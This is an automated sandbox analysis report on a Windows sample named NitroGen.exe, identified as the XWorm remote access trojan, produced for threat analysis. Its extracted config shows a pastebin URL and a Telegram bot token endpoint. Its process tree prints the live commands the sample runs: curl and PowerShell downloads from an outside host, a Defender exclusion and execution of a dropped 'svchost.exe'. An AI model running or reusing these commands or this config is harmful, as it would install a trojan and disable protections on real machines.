Analysis

  • max time kernel
    10s
  • max time network
    12s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    10-11-2024 21:33

General

  • Target
    NitroGen.exe
  • Size
    244KB
  • MD5
    ba199a53400605e0dddec76f0bbb5d4f
  • SHA1
    81182bc28677dd07a8731d196244fb9643bde827
  • SHA256
    f273e967b289bf3c275aae486b8a49918a136c332fce84986417aac2f65d3a6a
  • SHA512
    578b6ac9bad24da3811239c8346e7d8fd33e2e3b1a322dddb829ce6336b5683421913f4dc8a12190d404ac8aa86129458b6ff3c24911a54986a485a61da815eb
  • SSDEEP
    1536:Grae78zjORCDGwfdCSog01313Rys5gCqbReEi0j+Rf21D2k:+ahKyd2n31F53/EAM2k

Malware Config

Extracted

Family

xworm

Attributes

  • Install_directory
    %AppData%
  • install_file
    svchost.exe
  • pastebin_url
    https://pastebin.com/raw/mDSLGN9q
  • telegram
    https://api.telegram.org/bot7168105056:AAGVK3B7ZFupxq4PpmnBpxAQOwJ5CUp76ow/sendMessage?chat_id=1992635040

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
    "C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c main.bat
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Windows\system32\curl.exe
        curl "https://download.t3k.site/d/TKZb9w6VkHTZyX68SiFGSXTD4mJnGe2pfci7dxQOrMkT6Ys58THoTTOTEwSQ" -o installer.bat
        3⤵
        PID:2396
      • C:\Windows\system32\curl.exe
        curl "https://download.t3k.site/d/VM5Pb1HkPC4lGvDGlSx6uv8qU8NTIBUCeSGvPdsb7fvePGrDEjfhfc4dTCXl" -o run.vbs
        3⤵
        PID:3936
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\run.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3460
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c installer.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:6012
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Powershell -Command "Set-MpPreference -ExclusionExtension exe"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1008
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Powershell -Command "Invoke-Webrequest 'https://download.t3k.site/d/vRjJCJlmX67rqifdZJH928gmqpPY0zcSgTwsV6NkTNTMtGKkm1SsVymBQVDz' -OutFile 'svchost.exe'"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5376
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            .\svchost.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2096

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 627073ee3ca9676911bee35548eff2b8
    SHA1: 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
    SHA256: 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
    SHA512: 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 1a9fa92a4f2e2ec9e244d43a6a4f8fb9
    SHA1: 9910190edfaccece1dfcc1d92e357772f5dae8f7
    SHA256: 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
    SHA512: 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\main.bat
    Filesize: 256B
    MD5: e262e5bd963c829357048858a2d64e04
    SHA1: 2884d6841512bc948a7daee268da91240faa3c13
    SHA256: 14fe35548160972a32833d45cd302460b39876ea26b7646f6b424c8654ce1b55
    SHA512: 694d507b078ddab1ad5cdb653f33507f716557609dff9a78e1091b7efde9093f5155d2bcd7e921a0ce581d6f3bd8fdd68b996452b956e7ceaa1d5c7dec5ce2de

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gwfr3cjx.wzw.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\installer.bat
    Filesize: 257B
    MD5: ae00757e6487b0c2ac116e09d5fd59c5
    SHA1: 3b4e7403b8934e8f31b68fbdff63fa063a91bd56
    SHA256: 57a777cf4a032ddc12d85b93fcbed6960608bb42e612b8ab224fbf5aff8f4f8e
    SHA512: 9431e99b9179fb2e33a5c227e9fc603e9c61b1db9f247b08c6b9874bb80b6510ff215c04e04ea9a77150307eb27c8dcc0dab4ce5f0757a13cdb5adbce9d98e15

  • C:\Users\Admin\AppData\Roaming\run.vbs
    Filesize: 134B
    MD5: 6d346aad37debed59b302c74a50d5ff7
    SHA1: 356bd92ec121ec0a3f4b1c12ef81ada47ebf6429
    SHA256: b4033fe422e7f1a0351bac53c119321b6c90b6877e65fef4de17bbbba2a767f2
    SHA512: 58865078ebf065fa969bed3b26172101f67193aaf6e9e018aa87d46ec535f982739a7b4526ad78c72788f71dd6d63094add2837a3c610d8ca345da8eab254112

  • C:\Users\Admin\AppData\Roaming\svchost.exe
    Filesize: 83KB
    MD5: cf73759724ceaffa0353900bd428a555
    SHA1: a62a68b7a2c0db839f05a763a9c5bda7b92f4709
    SHA256: 39d928ef59af8f60ad6ff7dc973cc3d00e3f6751d5fd3824c615c311b0a14da0
    SHA512: d6340601e1a3ebda121390d55a3f2fbb6a1fd38e8fb51115823377f72087ef17409eafe41c182736c20b70ce25fabc1f83750112804b981c34d791c69e403e11

  • memory/1008-13-0x000002106AAA0000-0x000002106AAC2000-memory.dmp
    Filesize: 136KB

  • memory/2096-34-0x0000000000B90000-0x0000000000BAC000-memory.dmp
    Filesize: 112KB